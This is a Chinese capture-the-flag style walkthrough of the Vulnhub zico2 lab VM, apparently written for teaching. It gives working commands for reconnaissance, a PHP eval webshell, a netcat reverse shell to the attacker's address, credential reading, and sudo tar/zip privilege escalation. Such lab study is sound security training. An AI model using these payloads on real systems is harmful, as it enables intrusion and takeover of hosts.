Vulnhub-zico2靶机教学

admin 2025年4月26日20:08:06评论0 views字数 1485阅读4分57秒阅读模式

本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列zico2靶机有一定的了解

一、信息收集阶段

靶机下载地址:https://download.vulnhub.com/zico/zico2.ova
因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.220.0/24

1、扫描网段,发现主机

nmap -sP 192.168.220.0/24
# 快速验证网段存活主机
Vulnhub-zico2靶机教学

2、扫描主机详细信息

nmap -sT -sV -sC  192.168.220.132
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等
Vulnhub-zico2靶机教学

3、扫描80端口web目录

dirb http://192.168.220.132
Vulnhub-zico2靶机教学

4、浏览网站

http://192.168.220.132/dbadmin
http://192.168.220.132/dbadmin/test_db.php

# 文件包含漏洞
http://192.168.220.132/view.php?page=tools.html
Vulnhub-zico2靶机教学
Vulnhub-zico2靶机教学
Vulnhub-zico2靶机教学
Vulnhub-zico2靶机教学

二、渗透阶段

1、搜索phpliteadmin历史漏洞

searchsploite phpliteadmin
Vulnhub-zico2靶机教学

2、下载exp文件

searchsploite -m 24044.txt

cat 24044.txt
Vulnhub-zico2靶机教学
Vulnhub-zico2靶机教学

3、使用burp suite爆破

Vulnhub-zico2靶机教学

4、登陆sqlitephp数据库管理工具

http://192.168.220.132/dbadmin/test_db.php
password:admin
Vulnhub-zico2靶机教学

5、创建“数据库"

poc.php
/usr/databases/poc.php
Vulnhub-zico2靶机教学
Vulnhub-zico2靶机教学

6、创建一句话木马

<?php @eval($_POST[cmd])?>
Vulnhub-zico2靶机教学
Vulnhub-zico2靶机教学

7、中国蚁剑连接一句话木马

Vulnhub-zico2靶机教学
Vulnhub-zico2靶机教学

8、反弹shell到kali攻击机

# kali建立监听
nc -lvnp 4444

# 蚁剑连接靶机
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.220.128 4444 >/tmp/f
Vulnhub-zico2靶机教学
Vulnhub-zico2靶机教学
Vulnhub-zico2靶机教学

三、提权阶段

1、查找suid权限

find / -perm -4000 -print 2>/dev/null  #查找SUID 权限的文件
Vulnhub-zico2靶机教学

2、查看系统版本内核

uname -a
lsb_release -a
Vulnhub-zico2靶机教学

3、查看系统文件

/home/zico/wordpress/wp-config.php
username:zico
passwd:sWfCsfJSPV9H3AmQzw8
Vulnhub-zico2靶机教学

4、切换zico用户

su zico
sWfCsfJSPV9H3AmQzw8
Vulnhub-zico2靶机教学

5、查看sudo -l

sudo -l
Vulnhub-zico2靶机教学

6、再次查找suid权限

find / -perm -4000 -print 2>/dev/null
Vulnhub-zico2靶机教学

7、tar提权

 sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Vulnhub-zico2靶机教学

8、zip提权

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
Vulnhub-zico2靶机教学

四、总结

本次靶机主要通过web目录扫描找到开源项目phpliteadmin,通过暴力破解登录其管理地址创建“数据库”写入一句话木马从而反弹shell连接攻击机,最后再通过开源cms:wordpress配置文件找到zico账号密码使用tar提权至root权限

原文始发于微信公众号(泷羽SEC-ohh):Vulnhub-zico2靶机教学

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月26日20:08:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-zico2靶机教学https://cn-sec.com/archives/4004123.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息